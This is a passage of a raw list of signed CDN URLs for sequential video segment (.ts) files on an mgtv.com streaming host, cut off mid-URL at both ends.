9503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FE1D3CC96FC3B6A2AF87888A57C83124_1040080_1050080_638_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FBA1AF353EFB65306C0B81488859BB7C_1050080_1060080_418_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3993C517F5FC78C632B480BA20D5766A_1060080_1070080_749_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E658826568E2BCB5630C621907E0C8D5_1070080_1080080_1635_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2DB356703E4112220EDCDF73D6278550_1080080_1090080_1121_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/654EAE4792CCA9FEBCBF8E0CE1C76D5D_1090080_1100080_1073_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/086750134CA3EFDDF6E67D9B8CDB4B0A_1100080_1110080_2118_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8288888D2FCDD0F09F13BBF0BFB04398_1110080_1120080_993_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8FB853A57436E56FC72C41CBA7D8F844_1120080_1130080_974_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/98AC47F7863C80842B92492BE4BAEAF9_1130080_1140080_442_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BA7702EB1CB45FCA0AF051436F286D99_1140080_1150080_1644_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C54D3440943072B6303E863D9757DB35_1150080_1160080_838_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0BB6A5CAD685D0668D8B3F2F48C53EF3_1160080_1170080_845_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/53167AB96A9BD8BD2E8F36AE957B947F_1170080_1180080_657_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/9A3A90A055F53DE3AFF3F680EC197453_1180080_1190080_520_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BF547984B223801425AEC11BADA7C107_1190080_1200080_669_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/06EB79EAAA44B1F035418CA50BE93E55_1200080_1210080_652_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C83A966488555CC9AA74D7446DC08F14_1210080_1220080_779_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E683A5A65515812DFECECED8EAADFE78_1220080_1230080_1061_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/B08EE905BE136EB6A6384D5D760A1930_1230080_1240080_1263_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4BD5696FD89A50108A220F321514085C_1240080_1250080_866_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F836A738F8265564C9BF417948964C4D_1250080_1260080_470_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYB